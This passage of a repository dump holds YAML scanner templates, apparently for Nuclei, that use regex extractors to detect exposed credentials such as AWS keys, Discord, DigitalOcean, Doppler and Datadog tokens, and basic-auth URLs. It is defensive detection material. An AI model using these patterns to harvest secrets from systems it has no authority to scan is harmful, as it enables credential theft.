.]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4b0a0048304602210087f98e454e5064757753028db3f4a280d96ee2ba47163b503031bb9000820d73022100f8348ca58ad2ee80dba4b7ccbca37a95b7ba44742a4f0ed2f5fd64b952843ef1:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/amazon/amazon-mws-auth-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-mws-auth-token-value 2 | 3 | info: 4 | name: Amazon MWS Authentication Token - Detect 5 | author: gaurang 6 | severity: medium 7 | description: Amazon MWS authentication token was detected. 8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 10 | cvss-score: 5.3 11 | cwe-id: CWE-200 12 | tags: file,keys,token,amazon,auth,mws 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | regex: 21 | - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" 22 | # digest: 4a0a00473045022100c334a6bda970ddcb70079df2f8a9a1769a7104636a611691c28787921fc2a1a102200bfe666c925c702093688b5f70b29028fa8c8c92c8b739cee1eaaa3a92144494:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/amazon/amazon-sns-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-sns-token 2 | 3 | info: 4 | name: Amazon SNS Token - Detect 5 | author: TheBinitGhimire 6 | severity: info 7 | description: Amazon SNS token was detected. 8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N 10 | cvss-score: 0 11 | cwe-id: CWE-200 12 | tags: file,keys,token,amazon,aws,sns 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | name: amazon-sns-topic 21 | regex: 22 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' 23 | 24 | # Enhanced by md on 2023/05/04 25 | # digest: 490a0046304402207e55ee87e40a2d4d85bcc06d548501b06c21297fdc881073d65676a4819deca30220739ca22a94917910a17365d5f3118dc91aec1092877dc91905cc1f2a0458100d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/amazon/aws-access-id.yaml: -------------------------------------------------------------------------------- 1 | id: aws-access-key 2 | 3 | info: 4 | name: Amazon Web Services Access Key ID - Detect 5 | author: gaurang 6 | severity: info 7 | description: Amazon Web Services Access Key ID token was detected. 8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N 10 | cvss-score: 0 11 | cwe-id: CWE-200 12 | tags: file,keys,token,aws,amazon 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | regex: 21 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 22 | # digest: 4a0a0047304502204131589055933e9abecb047239e920aaa9798065f2947a61b8a2ddd8be6fa73a0221009f95d88336637ef94923f4724a94bf96e48debf07677bae0fa3a2e6988751396:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/asana/asana-clientid.yaml: -------------------------------------------------------------------------------- 1 | id: asana-clientid 2 | 3 | info: 4 | name: Asana Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.go 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.yaml 10 | metadata: 11 | verified: true 12 | tags: asana,client,file,keys 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4a0a00473045022100ee80a7c2a35b34bc0d48c69c1e26169ef5a2181505d3836e47974bc04e41fbde0220796c13e9c14005e438971b5e1aa2f241fb1a2736a98df48c1acc98e50b1562b9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/beamer-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: beamer-api-token 2 | 3 | info: 4 | name: Beamer API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,beamer,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4a0a00473045022100fcfc6abc15f7dbbac899737691fc7df9720aa9fa24c15b3ab39d26c012479b6f022014363cacef4a92e1d65e067c948733f94b555d8d657b9007bc52d804b3c444cc:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/bittrex/bittrex-access-key.yaml: -------------------------------------------------------------------------------- 1 | id: bittrex-access-key 2 | 3 | info: 4 | name: Bittrex Access Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,bittrex,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4a0a00473045022021ae3b7bce6c874e3e9933741ecdd4a2950a724f5db03308c3d049b7fc8e3be0022100e2d9f990ba789c6f762dbfd3b566867d99336ef9f7be3b21f08fbb17cbd7e74d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/bittrex/bittrex-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: bittrex-secret-key 2 | 3 | info: 4 | name: Bittrex Secret Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,bittrex,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4b0a0048304602210080c3ff4f4d8f64380bbd4965cc0bf17aee48eec5d25f16020cd6c07a12e5a070022100f9df5e67a69fbd471e028a1fbe6e58159fc49c126517256fc1eeb86a0a25771d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/branch-key.yaml: -------------------------------------------------------------------------------- 1 | id: branch-key 2 | 3 | info: 4 | name: Branch.io Live Key - Detect 5 | author: 0xh7ml 6 | severity: info 7 | description: Branch.io live key token was detected. 8 | reference: 9 | - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 10 | classification: 11 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N 12 | cvss-score: 0 13 | cwe-id: CWE-200 14 | tags: file,keys,token 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | regex: 22 | - "key_live_.{32}" 23 | 24 | # Enhanced by md on 2023/05/04 25 | # digest: 490a004630440220307fbc9759a842b11dab44b3a55e808d8e8a5b11cfad4fab56ae5bf6d7ff7ff602203a4a0c6e88a0cc25f9b4869f95a86611d5b5a789fe519bf11f8be6fa685ba02c:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/clojars-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: clojars-api-token 2 | 3 | info: 4 | name: Clojars API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,clojars,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(CLOJARS_)[a-z0-9]{60} 22 | # digest: 4a0a00473045022100e8e34978eeeb59acc43a8c856b5fc0749395c50c95f49496f094ac4cf789dfa0022023f583e761abc90a1bdc22094f12af0e622aa61686970bfa18d42db1cb3a79ff:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/cloudinary.yaml: -------------------------------------------------------------------------------- 1 | id: cloudinary-basic-auth 2 | 3 | info: 4 | name: Cloudinary Basic Authorization - Detect 5 | author: gaurang 6 | severity: high 7 | description: Cloudinary basic authorization token was detected. 8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 10 | cvss-score: 7.5 11 | cwe-id: CWE-200 12 | tags: keys,file,token,cloudinary 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | regex: 20 | - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" 21 | 22 | # Enhanced by md on 2023/05/04 23 | # digest: 490a0046304402201744d25857ea77e5daf43a26dc6f905aeb2b0a623b26aa428c90aa67ff84b3c502205bc4dd714202f82f1cbd9ad2b1b5d7d9d97213f83918afc43b060b4970e5f493:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/codecov-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: codecov-access-token 2 | 3 | info: 4 | name: Codecov Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,codecov,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a004830460221008723ce3d0d49d00043601d70f614318dd71d3c20680925198c2a9894cc454460022100cd817ccf94a80cfa81cc2cb192791e916edb1a8612a6ee15e604bbf2dc33d1d6:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/credentials.yaml: -------------------------------------------------------------------------------- 1 | id: basic-auth-creds 2 | 3 | info: 4 | name: Basic Authorization Credentials Check 5 | author: gaurang 6 | severity: high 7 | description: Basic authorization credentials check was conducted. 8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 10 | cvss-score: 7.5 11 | cwe-id: CWE-200 12 | tags: file,keys,token,auth 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | regex: 20 | - "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]" 21 | 22 | # Enhanced by md on 2023/05/04 23 | # digest: 4a0a0047304502202df27d9178759221ccfd4f42d805760dde03a437cdc608ec1f4f2db3eb89ecde022100d7db05435aaea98edaf4c7bf280ba2d6f0705d6241b5cf95a5502da2d507f8a2:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/databricks-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: databricks-api-token 2 | 3 | info: 4 | name: Databricks API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,databricks,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a00483046022100d6d700b349ee1fb96e6cd411540efe63b8889339763cbb99e050c5f818336a55022100e87d0bfb5914fdd8aeabf876d62b8cabd4ceefd2150d4f5b51fea00e13847dc6:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/datadog-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: datadog-access-token 2 | 3 | info: 4 | name: Datadog Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,datadog,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:datadog)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a00483046022100934a76ae8d3357dca6e4451871e708a0b644e72c823623aa11e4b212b5df92d5022100df2cce06f252dc3bd0cd517ca757cf1569d1c306f51776bdf2503fe71bc9e20e:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/dependency/dependency-track.yaml: -------------------------------------------------------------------------------- 1 | id: dependency-track 2 | 3 | info: 4 | name: Dependency Track API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dependency_track.yml 9 | - https://docs.dependencytrack.org/integrations/rest-api/ 10 | - https://docs.dependencytrack.org/getting-started/configuration/ 11 | metadata: 12 | verified: true 13 | max-request: 1 14 | tags: dependency,keys,file 15 | 16 | file: 17 | - extensions: 18 | - all 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - \b(odt_[A-Za-z0-9]{32,255})\b 25 | # digest: 4a0a004730450220702a4c3c4219c5f6c449c503a1ada1924589fe8a8ee69ca9788a4fd1da542a7f022100c396ad3ca884547cbb32a55a497a33e09e9d592987536b27742dae33485e1abf:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/digitalocean/digitalocean-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: digitalocean-personal-token 2 | 3 | info: 4 | name: DigitalOcean Personal Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml 9 | - https://docs.digitalocean.com/reference/api/ 10 | metadata: 11 | verified: true 12 | tags: keys,file,digitalocean,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)\b(doo_v1_[a-f0-9]{64})\b 23 | # digest: 4a0a0047304502201ccaf3d5a659a1894d1c7a03933525e497128dcc3bf18923983865cbc0589f4f022100d373d44b781d6d17d86eb95e98b1293ea6fe64100591124dc0aba8caa73c600e:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/digitalocean/digitalocean-personal-access.yaml: -------------------------------------------------------------------------------- 1 | id: digitalocean-personal-access 2 | 3 | info: 4 | name: DigitalOcean Personal Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml 9 | - https://docs.digitalocean.com/reference/api/ 10 | metadata: 11 | verified: true 12 | tags: file,keys,digitalocean,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)\b(dop_v1_[a-f0-9]{64})\b 23 | # digest: 4a0a00473045022100f146de3e812aa02bc68e6bd8a380bbb31e19020d3b029b7058a43b25a50cd67c02201aaa5c47262abba69de2d0520cab36504880f2eb20785e5c81e7af2d4e20d1bd:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/digitalocean/digitalocean-refresh-token.yaml: -------------------------------------------------------------------------------- 1 | id: digitalocean-refresh-token 2 | 3 | info: 4 | name: DigitalOcean Refresh Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml 9 | - https://docs.digitalocean.com/reference/api/ 10 | metadata: 11 | verified: true 12 | tags: file,keys,digitalocean,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)\b(dor_v1_[a-f0-9]{64})\b 23 | # digest: 4a0a004730450220402ac7235c9f81afab06065b456d5b16538ef65064d66dc59b93ffe594109f6b022100eceb599d627e574fc31382e8444e8101d779d0480e9a98691a2834a2658e6dff:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/discord/discord-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: discord-api-token 2 | 3 | info: 4 | name: Discord API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,discord,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 490a00463044022037733afdc50da25bb9aad70105e098f1202e735dc5444395ce93ab296deaa5e9022067beba9000a0f6beb4c06e8ee726b8da6eb5c318ed497acb539100d2c07dee3b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/discord/discord-client-id.yaml: -------------------------------------------------------------------------------- 1 | id: discord-client-id 2 | 3 | info: 4 | name: Discord Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,discord,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4a0a0047304502200d273d5de14ba14f6ffb36950cef0703e6397c3b39ce626788b05c5175646176022100b31634e39d09a01921856286b8498ec9d340d32e9b39c2a70878fc034bbf8499:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/docker/dockerhub-pat.yaml: -------------------------------------------------------------------------------- 1 | id: dockerhub-pat 2 | 3 | info: 4 | name: Docker Hub Personal Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dockerhub.yml 9 | - https://docs.docker.com/security/for-developers/access-tokens/ 10 | metadata: 11 | verified: true 12 | tags: docker,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - \b(dckr_pat_[a-zA-Z0-9_-]{27})(?:$|[^a-zA-Z0-9_-]) 23 | # digest: 4a0a00473045022100bc73fcf69453af6d917f363d99e57d06620e6b40f1e38b54ac72982c1aff0865022030218f700bce4f88878c34d596fcc3563ee6a6a0f233055703455751caaabd08:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-api-token 2 | 3 | info: 4 | name: Doppler API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,doppler,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (dp\.pt\.)(?i)[a-z0-9]{43} 22 | # digest: 4a0a00473045022100dc52d6b1fb23bf2c2c3c8d4d9e916c690983e2be8fab56fad96025202a66d37902200c8b8f6a353d9f716725c24c0de34f2ef15e0b3a7be7bb55442053a6f610daa2:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler/doppler-audit.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-audit 2 | 3 | info: 4 | name: Doppler Audit Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml 9 | - https://docs.doppler.com/reference/api 10 | - https://docs.doppler.com/reference/auth-token-formats 11 | metadata: 12 | verified: true 13 | tags: doppler,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - \b(dp\.audit\.[a-zA-Z0-9]{40,44})\b 24 | # digest: 490a00463044022047f3853a49b38bfc41c3a21edae871fa20dbc00c3e4fec75a443da4c802ce4e702205fce2aa010ee24edfbc190aad5475ba28a4ea42e81476b2e36a2eb95de8c4479:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler/doppler-cli.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-cli 2 | 3 | info: 4 | name: Doppler CLI Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml 9 | - https://docs.doppler.com/reference/api 10 | - https://docs.doppler.com/reference/auth-token-formats 11 | metadata: 12 | verified: true 13 | tags: doppler,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - \b(dp\.ct\.[a-zA-Z0-9]{40,44})\b 24 | # digest: 4b0a00483046022100de413ad22bea43d8292d3d22ed07b2d5c6a06bfb4819104c20eeb9134f913be2022100d2915ad20b135f4f8d477c1acec455af6c749833455e09d2542c0e849ab3fc7b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler/doppler-scim.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-scim 2 | 3 | info: 4 | name: Doppler SCIM Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml 9 | - https://docs.doppler.com/reference/api 10 | - https://docs.doppler.com/reference/auth-token-formats 11 | metadata: 12 | verified: true 13 | tags: doppler,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - \b(dp\.scim\.[a-zA-Z0-9]{40,44})\b 24 | # digest: 4a0a00473045022010274194b3725b6ef14112e5fc7f4e0d5c60123a51583f044bf2e94b76077001022100a0caa7739f04c145ec8ee920c613f38a6b5befd04918931bd0ee39cfdbcf3a44:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler/doppler-service-account.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-service-account 2 | 3 | info: 4 | name: Doppler Service Account Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml 9 | - https://docs.doppler.com/reference/api 10 | - https://docs.doppler.com/reference/auth-token-formats 11 | metadata: 12 | verified: true 13 | tags: doppler,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - \b(dp\.sa\.[a-zA-Z0-9]{40,44})\b 24 | # digest: 4a0a00473045022100c8177f1a0244e794af08cc9615e65a415d8cb7dc3616acc9f779e61aab518eb002204d63814164c93815807eb87c0919830977be1d4f878bd1697b90644de744894c:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler/doppler-service.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-service 2 | 3 | info: 4 | name: Doppler Service 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml 9 | - https://docs.doppler.com/reference/api 10 | - https://docs.doppler.com/reference/auth-token-formats 11 | metadata: 12 | verified: true 13 | tags: doppler,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - \b(dp\.st\.(?:[a-z0-9\-_]{2,35}\.)?[a-zA-Z0-9]{40,44})\b 24 | # digest: 4a0a00473045022100b61969103e1649c2c330814280aea5b020d5f47ca55c9601d0647af01c47ddbf02200698f545c2217332324593dffcc44a82bccb5ec45faf31507c356b71ee4ad7cf:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/droneci-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: droneci-access-token 2 | 3 | info: 4 | name: Droneci Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,droneci,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a00483046022100b8f035e2f690ff06f1064c2fad434ef3faf43af1d86770b66ad77ecd44b93910022100fcf85bc0bcc2f473500998a866956b53f21d72f6325c80dbf3f758f0009614a2:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/dropbox/dropbox-access.yaml: -------------------------------------------------------------------------------- 1 | id: dropbox-access 2 | 3 | info: 4 | name: Dropbox Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - 